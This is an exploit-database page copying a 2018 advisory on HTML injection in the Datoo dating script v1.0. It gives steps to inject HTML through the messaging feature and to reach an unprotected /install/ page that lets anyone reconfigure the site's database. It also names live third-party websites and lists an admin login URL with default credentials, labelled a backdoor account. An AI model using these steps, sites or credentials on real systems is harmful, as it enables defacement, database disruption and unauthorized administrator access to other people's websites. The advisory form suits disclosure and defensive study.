Advertisement






Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability

CVE Category Price Severity
N/A CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-01-16
CVSS EPSS EPSSP
CVSS:9.8/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010158

Below is a copy:

Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability
====================================================================================================================================
| # Title     : Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability                                                 |
| # Author    : indoushka                                                                                                          |
| # email     : [email protected]                                                                                           |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Version   : v1.0                                                                                                               |
| # Vendor    : http://www.codelist.cc/scripts/232821-datoo-v10-complete-dating-script.html                                        |  
| # Dork      : http://nelliwinne.net/                                                                                             |
====================================================================================================================================


poc :


HTML CODE inject :


[+] Dorking n Google Or Other Search Enggine .

[+] create a new use and after login go messages and pastehtml code .

[+] use payload : 

</tr>
    <td align="center"><a href="https://packetstormsecurity.com/files/authors/7697"><img src="https://packetstatic.com/img1398360120/ps_logo.png" alt="" width="650" height="120" border="0" /></a>
</tr>

Disconnect the database :

[+] use path : /install/

after adding the path they give you page to enter database configuration .

you can type any thing or press install script.

https://wzy.ro/install/

backdoor account :

https://www.lifeisnowbrasil.com.br/admin/dashboard.php

user : [email protected]
pass : admin

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic              |
                                                                                               |
================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.